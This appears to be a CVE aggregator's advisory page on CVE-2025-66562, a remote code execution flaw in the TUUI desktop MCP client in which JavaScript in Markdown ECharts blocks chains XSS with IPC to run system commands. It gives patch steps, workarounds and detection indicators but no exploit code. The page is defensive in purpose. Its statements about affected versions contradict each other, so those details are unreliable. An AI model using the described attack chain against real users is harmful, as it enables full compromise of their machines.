CVE-2025-66562
📋 TL;DR
CVE-2025-66562 is a critical Remote Code Execution vulnerability in TUUI desktop MCP client versions before 1.3.4. An attacker can execute arbitrary system commands on a victim's machine by tricking them into viewing malicious Markdown content containing JavaScript in ECharts code blocks. All users running vulnerable versions of TUUI are affected.
💻 Affected Systems
- TUUI (desktop MCP client)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attacker to execute arbitrary commands, steal data, install malware, or pivot to other systems.
Likely Case
Attacker gains remote code execution on user's machine through social engineering or malicious content delivery.
If Mitigated
Limited impact if proper network segmentation and least privilege principles are followed, but local machine compromise still possible.
🎯 Exploit Status
Exploitation requires user interaction (viewing malicious Markdown) but no authentication. The vulnerability chain (XSS + IPC) makes reliable exploitation straightforward.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.4
Vendor Advisory: https://github.com/AI-QL/tuui/security/advisories/GHSA-qjhq-rgmr-6c3g
Restart Required: Yes
Instructions:
1. Download TUUI version 1.3.4 from official GitHub releases. 2. Uninstall previous version. 3. Install version 1.3.4. 4. Restart the application.
🔧 Temporary Workarounds
Disable Markdown rendering
allDisable Markdown parsing in TUUI configuration to prevent XSS vector
Check TUUI documentation for configuration options to disable Markdown rendering
Network filtering
allBlock external Markdown content delivery via web proxy or firewall
🧯 If You Can't Patch
- Discontinue use of TUUI until patched
- Run TUUI in isolated environment with restricted network access
🔍 How to Verify
Check if Vulnerable:
Check TUUI version in application settings or about dialogCheck Version:
Check TUUI application menu → About or Settings → VersionVerify Fix Applied:
Verify version is 1.3.4 or higher in application settings📡 Detection & Monitoring
Log Indicators:
- Unusual process spawns from TUUI
- JavaScript execution errors in TUUI logs
- IPC calls to spawn processes
Network Indicators:
- TUUI fetching external Markdown content
- Unusual outbound connections from TUUI process
SIEM Query:
Process creation where parent process contains 'tuui' AND command line contains unusual system commands